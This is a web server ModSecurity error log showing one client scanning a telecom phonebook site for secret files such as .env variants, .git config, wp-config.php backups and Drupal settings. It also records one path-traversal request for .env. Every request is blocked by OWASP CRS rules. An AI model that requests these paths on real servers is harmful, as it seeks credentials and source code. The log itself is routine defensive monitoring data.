[Mon May 11 15:23:08.655988 2026] [security2:error] [pid 1320674:tid 1320701] [client 195.178.110.133:46150] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.phonebook.tct-telecom.fr"] [uri "/.env.local"] [unique_id "agHYPKO9RdIr1DwxYR2SkgAAAMs"]
[Mon May 11 15:23:08.656003 2026] [security2:error] [pid 1319886:tid 1319919] [client 195.178.110.133:46100] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.phonebook.tct-telecom.fr"] [uri "/.env.save"] [unique_id "agHYPKy-5-wpj6Sx56aYngAAAA0"]
[Mon May 11 15:23:08.656106 2026] [security2:error] [pid 1320674:tid 1320701] [client 195.178.110.133:46150] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.phonebook.tct-telecom.fr"] [uri "/.env.local"] [unique_id "agHYPKO9RdIr1DwxYR2SkgAAAMs"]
[Mon May 11 15:23:08.656296 2026] [security2:error] [pid 1319886:tid 1319919] [client 195.178.110.133:46100] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.phonebook.tct-telecom.fr"] [uri "/.env.save"] [unique_id "agHYPKy-5-wpj6Sx56aYngAAAA0"]
[Mon May 11 15:23:08.656353 2026] [security2:error] [pid 1320674:tid 1320701] [client 195.178.110.133:46150] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.phonebook.tct-telecom.fr"] [uri "/.env.local"] [unique_id "agHYPKO9RdIr1DwxYR2SkgAAAMs"]
[Mon May 11 15:23:08.660221 2026] [security2:error] [pid 1319953:tid 1319960] [client 195.178.110.133:46154] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.phonebook.tct-telecom.fr"] [uri "/.env~"] [unique_id "agHYPOSQ-m-m0ukSShuBwgAAAUU"]
[Mon May 11 15:23:08.660318 2026] [security2:error] [pid 1319886:tid 1319923] [client 195.178.110.133:46058] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/refs/heads/master"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.phonebook.tct-telecom.fr"] [uri "/.git/refs/heads/master"] [unique_id "agHYPKy-5-wpj6Sx56aYnwAAAA8"]
[Mon May 11 15:23:08.660392 2026] [security2:error] [pid 1319953:tid 1319960] [client 195.178.110.133:46154] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.phonebook.tct-telecom.fr"] [uri "/.env~"] [unique_id "agHYPOSQ-m-m0ukSShuBwgAAAUU"]
[Mon May 11 15:23:08.660436 2026] [security2:error] [pid 1319886:tid 1319923] [client 195.178.110.133:46058] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.phonebook.tct-telecom.fr"] [uri "/.git/refs/heads/master"] [unique_id "agHYPKy-5-wpj6Sx56aYnwAAAA8"]
[Mon May 11 15:23:08.660589 2026] [security2:error] [pid 1319953:tid 1319960] [client 195.178.110.133:46154] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.phonebook.tct-telecom.fr"] [uri "/.env~"] [unique_id "agHYPOSQ-m-m0ukSShuBwgAAAUU"]
[Mon May 11 15:23:08.660836 2026] [security2:error] [pid 1319886:tid 1319923] [client 195.178.110.133:46058] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.phonebook.tct-telecom.fr"] [uri "/.git/refs/heads/master"] [unique_id "agHYPKy-5-wpj6Sx56aYnwAAAA8"]
[Mon May 11 15:23:08.663011 2026] [security2:error] [pid 1320398:tid 1320421] [client 195.178.110.133:45992] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.phonebook.tct-telecom.fr"] [uri "/wp-config.php"] [unique_id "agHYPOJEyNRN152ArOSMogAAAFU"]
[Mon May 11 15:23:08.663133 2026] [security2:error] [pid 1320398:tid 1320421] [client 195.178.110.133:45992] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.phonebook.tct-telecom.fr"] [uri "/wp-config.php"] [unique_id "agHYPOJEyNRN152ArOSMogAAAFU"]
[Mon May 11 15:23:08.663615 2026] [security2:error] [pid 1320398:tid 1320421] [client 195.178.110.133:45992] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.phonebook.tct-telecom.fr"] [uri "/wp-config.php"] [unique_id "agHYPOJEyNRN152ArOSMogAAAFU"]
[Mon May 11 15:23:08.669837 2026] [security2:error] [pid 1319885:tid 1319910] [client 195.178.110.133:46114] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.phonebook.tct-telecom.fr"] [uri "/.env.old"] [unique_id "agHYPFchVQ3tCn0m9OpY-AAAAQ0"]
[Mon May 11 15:23:08.670164 2026] [security2:error] [pid 1319885:tid 1319910] [client 195.178.110.133:46114] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.phonebook.tct-telecom.fr"] [uri "/.env.old"] [unique_id "agHYPFchVQ3tCn0m9OpY-AAAAQ0"]
[Mon May 11 15:23:08.670282 2026] [security2:error] [pid 1319953:tid 1319966] [client 195.178.110.133:46140] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/refs/heads/main"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.phonebook.tct-telecom.fr"] [uri "/.git/refs/heads/main"] [unique_id "agHYPOSQ-m-m0ukSShuBwwAAAUs"]
[Mon May 11 15:23:08.670392 2026] [security2:error] [pid 1319885:tid 1319910] [client 195.178.110.133:46114] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.phonebook.tct-telecom.fr"] [uri "/.env.old"] [unique_id "agHYPFchVQ3tCn0m9OpY-AAAAQ0"]
[Mon May 11 15:23:08.670399 2026] [security2:error] [pid 1319953:tid 1319966] [client 195.178.110.133:46140] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.phonebook.tct-telecom.fr"] [uri "/.git/refs/heads/main"] [unique_id "agHYPOSQ-m-m0ukSShuBwwAAAUs"]
[Mon May 11 15:23:08.670578 2026] [security2:error] [pid 1319953:tid 1319966] [client 195.178.110.133:46140] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.phonebook.tct-telecom.fr"] [uri "/.git/refs/heads/main"] [unique_id "agHYPOSQ-m-m0ukSShuBwwAAAUs"]
[Mon May 11 15:23:08.670913 2026] [security2:error] [pid 1319953:tid 1319970] [client 195.178.110.133:46046] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.phonebook.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYPOSQ-m-m0ukSShuBxAAAAU8"]
[Mon May 11 15:23:08.671032 2026] [security2:error] [pid 1319953:tid 1319970] [client 195.178.110.133:46046] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.phonebook.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYPOSQ-m-m0ukSShuBxAAAAU8"]
[Mon May 11 15:23:08.671224 2026] [security2:error] [pid 1319953:tid 1319970] [client 195.178.110.133:46046] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.phonebook.tct-telecom.fr"] [uri "/.env"] [unique_id "agHYPOSQ-m-m0ukSShuBxAAAAU8"]
[Mon May 11 15:23:08.672043 2026] [security2:error] [pid 1319998:tid 1320010] [client 195.178.110.133:46020] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.phonebook.tct-telecom.fr"] [uri "/app/.env"] [unique_id "agHYPKt2WtvoFr7xvGzUOgAAAIo"]
[Mon May 11 15:23:08.672459 2026] [security2:error] [pid 1319998:tid 1320010] [client 195.178.110.133:46020] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.phonebook.tct-telecom.fr"] [uri "/app/.env"] [unique_id "agHYPKt2WtvoFr7xvGzUOgAAAIo"]
[Mon May 11 15:23:08.672641 2026] [security2:error] [pid 1319998:tid 1320010] [client 195.178.110.133:46020] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.phonebook.tct-telecom.fr"] [uri "/app/.env"] [unique_id "agHYPKt2WtvoFr7xvGzUOgAAAIo"]
[Mon May 11 15:23:08.673512 2026] [core:error] [pid 1320398:tid 1320418] [client 195.178.110.133:46050] AH10244: invalid URI path (/storage/../../../.env)
[Mon May 11 15:23:08.673803 2026] [security2:error] [pid 1320674:tid 1320696] [client 195.178.110.133:46078] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.phonebook.tct-telecom.fr"] [uri "/wp-config.php.bak"] [unique_id "agHYPKO9RdIr1DwxYR2SlAAAAMY"]
[Mon May 11 15:23:08.673916 2026] [security2:error] [pid 1320674:tid 1320696] [client 195.178.110.133:46078] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.phonebook.tct-telecom.fr"] [uri "/wp-config.php.bak"] [unique_id "agHYPKO9RdIr1DwxYR2SlAAAAMY"]
[Mon May 11 15:23:08.674086 2026] [security2:error] [pid 1320674:tid 1320696] [client 195.178.110.133:46078] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.phonebook.tct-telecom.fr"] [uri "/wp-config.php.bak"] [unique_id "agHYPKO9RdIr1DwxYR2SlAAAAMY"]
[Mon May 11 15:23:08.674096 2026] [security2:error] [pid 1320674:tid 1320701] [client 195.178.110.133:46150] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.phonebook.tct-telecom.fr"] [uri "/.env.bak"] [unique_id "agHYPKO9RdIr1DwxYR2SlQAAAMs"]
[Mon May 11 15:23:08.674217 2026] [security2:error] [pid 1320674:tid 1320701] [client 195.178.110.133:46150] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.phonebook.tct-telecom.fr"] [uri "/.env.bak"] [unique_id "agHYPKO9RdIr1DwxYR2SlQAAAMs"]
[Mon May 11 15:23:08.674393 2026] [security2:error] [pid 1320674:tid 1320701] [client 195.178.110.133:46150] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.phonebook.tct-telecom.fr"] [uri "/.env.bak"] [unique_id "agHYPKO9RdIr1DwxYR2SlQAAAMs"]
[Mon May 11 15:23:08.679832 2026] [security2:error] [pid 1319886:tid 1319923] [client 195.178.110.133:46058] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.phonebook.tct-telecom.fr"] [uri "/.git/config"] [unique_id "agHYPKy-5-wpj6Sx56aYowAAAA8"]
[Mon May 11 15:23:08.679838 2026] [security2:error] [pid 1319885:tid 1319912] [client 195.178.110.133:46048] ModSecurity: Warning. Matched phrase "/.gitignore" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.gitignore found within REQUEST_FILENAME: /.gitignore"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.phonebook.tct-telecom.fr"] [uri "/.gitignore"] [unique_id "agHYPFchVQ3tCn0m9OpY-gAAAQ4"]
[Mon May 11 15:23:08.679950 2026] [security2:error] [pid 1319886:tid 1319923] [client 195.178.110.133:46058] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.phonebook.tct-telecom.fr"] [uri "/.git/config"] [unique_id "agHYPKy-5-wpj6Sx56aYowAAAA8"]
[Mon May 11 15:23:08.679955 2026] [security2:error] [pid 1319885:tid 1319912] [client 195.178.110.133:46048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.phonebook.tct-telecom.fr"] [uri "/.gitignore"] [unique_id "agHYPFchVQ3tCn0m9OpY-gAAAQ4"]
[Mon May 11 15:23:08.680123 2026] [security2:error] [pid 1319886:tid 1319923] [client 195.178.110.133:46058] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.phonebook.tct-telecom.fr"] [uri "/.git/config"] [unique_id "agHYPKy-5-wpj6Sx56aYowAAAA8"]
[Mon May 11 15:23:08.680125 2026] [security2:error] [pid 1319885:tid 1319912] [client 195.178.110.133:46048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.phonebook.tct-telecom.fr"] [uri "/.gitignore"] [unique_id "agHYPFchVQ3tCn0m9OpY-gAAAQ4"]
[Mon May 11 15:23:08.681664 2026] [security2:error] [pid 1319885:tid 1319900] [client 195.178.110.133:46012] ModSecurity: Warning. Matched phrase "/sites/default/settings.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /sites/default/settings.php found within REQUEST_FILENAME: /sites/default/settings.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.phonebook.tct-telecom.fr"] [uri "/sites/default/settings.php"] [unique_id "agHYPFchVQ3tCn0m9OpY-wAAAQk"]
